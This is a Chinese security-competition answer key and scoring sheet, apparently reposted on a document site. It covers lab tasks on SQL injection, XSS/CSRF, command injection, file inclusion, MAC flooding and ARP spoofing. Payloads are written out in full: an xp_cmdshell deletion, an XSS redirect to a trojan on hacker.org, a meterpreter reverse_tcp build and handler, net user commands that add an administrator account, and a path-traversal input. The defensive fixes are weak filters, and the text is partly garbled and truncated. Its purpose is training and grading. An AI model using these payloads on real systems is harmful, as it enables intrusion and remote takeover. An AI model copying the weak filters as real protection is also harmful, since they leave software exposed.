信息安全管理与评估赛题与评分标准 第二阶段答案及评分标准.docx
- 文档编号:8839487
- 上传时间:2023-02-02
- 格式:DOCX
- 页数:34
- 大小:1.92MB
信息安全管理与评估赛题与评分标准 第二阶段答案及评分标准.docx
《信息安全管理与评估赛题与评分标准 第二阶段答案及评分标准.docx》由会员分享,可在线阅读,更多相关《信息安全管理与评估赛题与评分标准 第二阶段答案及评分标准.docx(34页珍藏版)》请在冰豆网上搜索。
信息安全管理与评估赛题与评分标准第二阶段答案及评分标准
任务1:
SQL注入攻防(55分)
1.Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:
(2分)
页面标题:
找到提交的变量名(3分)
提供以下变量:
name="usernm"
name="passwd"
2.对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)
构造注入语句:
username:
任意用户名
password:
含:
orX=’X
(X为任意值)
(3分)
同时包含截图:
1、通过任意用户名登录(截图)
2、登录成功页面(截图)
(2分)
3.进入DCST中的WebServ2003服务器的C:
\AppServ\www目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)
(10分)
包含语句:
1、
selectpasswordfromuserswhereusername=’$username’
2、
if($obj->password==$password)
4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并将验证过程截图;(5分)
同时包含截图:
1、通过任意用户名登录(截图)
2、登陆后,页面出现用户名不存在提示;(截图)
(5分)
5.Web继续访问DCST中的WebServ2003服务器,"/"->"EmployeeInformationQuery",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:
(2分)
找到的源程序含有页面标题:
找到提交的变量名(3分)
name="usernm"
6.对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)
(2分)
输入“%”,返回所有用户信息(截图)
输入“_”,返回所有用户信息(截图)
(3分)
7.通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:
\目录下的1.txt文档,并将注入代码及测试过程截图;(5分)
构造注入语句:
‘execmaster.dbo.xp_cmdshell‘delc:
\1.txt’--
(5分)
8.进入DCST中的WebServ2003服务器的C:
\AppServ\www目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)
截图:
在服务器场景QueryCtrl.php源程序语句:
$keyWord=$_REQUEST[‘usernm’]之后加入:
(10分)
9.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。
(5分)
通过:
‘execmaster.dbo.xp_cmdshell‘delc:
\1.txt’—
再次进行SQL注入截图;
系统出现错误提示:
BadKeyWord!
(截图)
(5分)
任务2:
XSS和CSRF攻防(65分)
1.Web访问DCST中的WebServ2003服务器,"/"->"EmployeeMessageBoard",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:
(2分)
含有页面标题:
找到提交的变量名:
(3分)
name="MessageUsername"
name="message"
2.对该任务题目1页面注入点进行XSS渗透测试,并进入"/"->"EmployeeMessageBoard"->"DisplayMessage"页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)
构造注入代码:
(2分)
测试注入成功:
(3分)
弹出alert("Hacker!
")括号中的消息;
3.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(http:
//hacker.org/)中的木马程序:
http:
//hacker.org/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)
构造注入代码:
(2分)
location.href="http:
//hacker.org/TrojanHorse.exe";
测试过程:
(3分)
名称:
trojanhorse.exe
发送者:
hacker.org
4.通过IIS搭建网站(http:
//hacker.org/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(http:
//hacker.org/)的WWW根目录下,并将搭建该网站结果截图;(5分)
搭建IIS(1分)
Internet信息服务:
网站目录下存放:
trojanhorse.exe
搭建DNS(1分)
正向查找区域:
主机(截图)
Zone:
Org
主机:
hacker
MetasploitFramework:
TrojanHorse.exe生成(3分)
root@bt:
~#Ifconfig
(截图)
显示KaliIP地址:
X.X.X.X
截图包含:
root@bt:
~#msfvenom–pwindows/meterpreter/reverse_tcpLHOST=X.X.X.XLPORT=80–fexe–otrojanhorse.exe
5.当"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者执行网站(http:
//hacker.org/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)
MetasploitFramework:
HackerReverseTcp连接客户端(2分)
root@bt:
~#msfconsole
msf>useexploit/multi/handler
msfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcp
PAYLOAD=>windows/meterpreter/reverse_tcp
msfexploit(handler)>setLHOSTX.X.X.X
LHOST=>X.X.X.X
msfexploit(handler)>setLPORT80
LPORT=>80
msfexploit(handler)>exploit
[*]StartedreversehandleronX.X.X.X:
80
[*]Startingthepayloadhandler...
(截图中包含黄色部分)
访问者主机需要被Kali主机远程控制(3分)
KaliMSF提示(截图)包含如下信息
KaliIP:
X.X.X.X
访问者主机IP:
Y.Y.Y.Y
[*]Sendingstage(……bytes)toY.Y.Y.Y
[*]Meterpretersession1opened(X.X.X.X:
Port1->Y.Y.Y.Y:
Port2)at……
meterpreter>
Kali截图包含打开访问者主机的CMD.exe命令行窗口;
6.进入DCST中的WebServ2003服务器的C:
\AppServ\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分)
(10分)
在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:
绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分;
$info=str_replace(“<”,”(”,$info);
$info=str_replace(“>”,”)”,$info);
或
$info=str_replace(“<”,”{”,$info);
$info=str_replace(“>”,”}”,$info);
或
$info=str_replace(“<”,”[”,$info);
$info=str_replace(“>”,”]”,$info);
7.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)
SQLServer企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时CommunicationMessage页面显示Content:
注入语句符号“<”和“>”被替换为上一题替换后的字符;
(5分)
8.Web访问DCST中的WebServ2003服务器,"/"->"ShoppingHall",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:
(2分)
页面标题为:
ShoppingHall
找到提交的变量名:
(3分)
goods=keyboard&quantity=1
goods=mouse&quantity=1
goods=monitor&quantity=1
goods=cpu&quantity=1
goods=memory&quantity=1
goods=dvdrom&quantity=1
9.对该任务题目1页面注入点进行渗透测试,使"/"->"EmployeeMessageBoard"->"DisplayMessage"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看"/"->"PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分)
构造注入代码:
(2分)
document.location="http:
//X.X.X.X/ShoppingProcess.php?
goods=cpu&quantity=999999";
WebServerIP:
X.X.X.X
测试过程:
(3分)
截图:
Goods:
CPU----数值大于或等于999999
10.进入DCST中的WebServ2003服务器的C:
\AppServ\www目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)
截图:
服务器场景DisplayMessage.php程序语句:
echo“Content:
”.”$obj->info”.”……”
替换为:
echo“Content:
”.strip_tags(”$obj->info”).”……”
(10分)
11.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)
(5分)
得分点:
直接显示代码信息,而不是将代码执行;
(截图)
SQLServer企业管理器中,Message表中info字段注入语句含有标记;同时CommunicationMessage页面显示Content:
注入语句不含有标记;
任务3:
命令注入与文件包含攻防(50分)
1.Web访问DCST中的WebServ2003服务器,"/"->"DisplayDirectory",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:
(2分)
页面标题:
\’sDirectory
找到提交的变量名:
(3分)
name="directory"
2.对该任务题目1页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:
\Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分)
注入语句:
(2分)
WINDOWS|netuserHackerP@ssword/add
WINDOWS|netlocalgroupadministratorsHacker/add
测试成功:
(3分)
截图:
含有:
命令成功完成。
3.进入DCST中的WebServ2003服务器的C:
\AppServ\www目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入渗透测试,并将修改后的源程序截图;(10分)
(10分)
包含语句:
$str=’|’
if(strstr($directory,$str)==false)
4.再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)
截图1:
利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;
含有本任务第2题的命令注入语句;
WINDOWS|netuserHackerP@ssword/add
WINDOWS|netlocalgroupadministratorsHacker/add
截图2:
页面出现非法输入提示;
含有本任务题目3修改后代码中的错误提示信息;
本案例提示信息为:
illegalinput!
(5分)
5.Web访问DCST中的WebServ2003服务器,"/"->"DisplayUploaded'sFileContent",分析该页面源程序,找到提交的变量名,并截图;(5分)
找到源程序:
(2分)
页面标题:
找到提交的变量名:
(3分)
name="filename"
6.对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:
AppServ/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分)
构造注入代码:
(2分)
..\..\..\AppServ\Apache2.2\logs\access.log
回显DCST中的WebServ2003服务器访问日志文件:
显示出AppServ/Apache2.2/logs/access.log的内容:
(3分)
InternetExplorer地址栏中须含有:
DisplayFileCtrl.php?
filename=
7.进入DCST中的WebServ2003服务器的C:
\AppServ\www目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)
(10分)
包含语句:
$str=’..’
if(strstr($directory,$str)==false)
8.再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。
(5分)
截图1:
利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;
输入框含有本任务题目6的注入代码:
..\..\..\AppServ\Apache2.2\logs\access.log
截图2:
页面出现非法输入提示;
含有本任务题目7修改后代码中的错误提示信息;
本案例提示信息为:
illegalinput!
(5分)
任务4:
数据窃取防护:
二层攻防(45分)
1.将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。
(2分)
截图:
PC1、Kali、DCST同在VLAN10;(#showvlan)
VLAN10中包含的接口数>=3;
WebServerIP配置(与参数表中服务器场景的IP地址一致):
PC1IP地址配置(与参数表中PC1的IP地址一致):
PC3IP地址配置(与参数表中PC3的IP地址一致):
三个终端之间能够相互Ping通;
在同一个窗口ping通除了本机外的2个IP地址;
2.查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。
(3分)
#showmac-address-tablecountvlan10
DCRS地址表空间中有可用的空间;
当前地址表记录数少于地址表容量;
Maxentires……
Total……:
16384
Currententires……
Total……:
该数值小于10
3.从Kali发起MACFlooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。
(5分)
Kali#macof
(2分)
#showmac-address-tablecountvlan10
当前地址表记录数等于地址表容量;
Maxentires……
Total……:
16384
Currententires……
Total……:
该数值=16384
(3分)
4.Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。
(5分)
PC1通过InternetExplorer访问;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/……
Kali打开wireshark,监听到PC1通过InternetExplorer访问DCST服务器场景的HTTP流量;
截图:
Source:
PC1的IP地址(与参数表一致)
Destination:
服务器场景的IP地址(与参数表一致)
Protocol:
HTTP
(5分)
5.在DCRS交换机Kali所连接端口配置PortSecurity特性,阻止Kali发起MACFlooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置信息以及验证信息截图。
(8分)
配置截图包含:
mac-address-learningcpu-control
(2分)
在VLAN10每个接口全部启用如下:
InterfaceEthernet1/0/X
switchportport-security
(2分)
#clearmac-address-tabledynamic
(2分)
#showmac-address-tablecountvlan10
DCRS地址表空间中有可用的空间;
当前地址表记录数少于地址表容量;
Maxentires……
Total……:
16384
Currententires……
Total……:
该数值小于10
(2分)
6.在DCRS交换机配置PortSecurity特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。
(7分)
PC1通过InternetExplorer访问服务器场景;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/……
Kali打开wireshark,监听不到PC1通过InternetExplorer访问DCST的HTTP流量;(截图)
Filter:
http
显示报文数:
空
任务5:
数据窃取防护:
ARP攻防(45分)
1.在PC1访问DCST中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。
(5分)
PC1、WebServ2003
Ipconfig/all
分别显示PC1、WebServ2003的IP和MAC;
PC1的IP和MAC:
服务器场景的IP和MAC:
PC1通过InternetExplorer访问服务器场景;(截图)
地址栏包含:
服务器场景IP(匹配参数表服务器场景IP)/……
PC1:
ARP表项内容为
WebServ2003的IP->WebServ2003的真实的MAC;
WebServ2003:
ARP表项内容为
PC1的IP->PC1的真实的MAC;
2.在Kali对PC1进行ARPSpoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:
DCST中的WebServ2003服务器IP->Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。
(5分)
Kali:
#arpspoof–tPC1_IPWebServ2003_IP
(过程截图)
(2分)
PC1:
ARP表项内容为
WebServ2003的IP->Kali的MAC;
KaliMAC:
ifconfig
(截图)
(3分)
3.在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用wir
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 信息安全管理与评估赛题与评分标准 第二阶段答案及评分标准 信息 安全管理 评估 评分标准 第二阶段 答案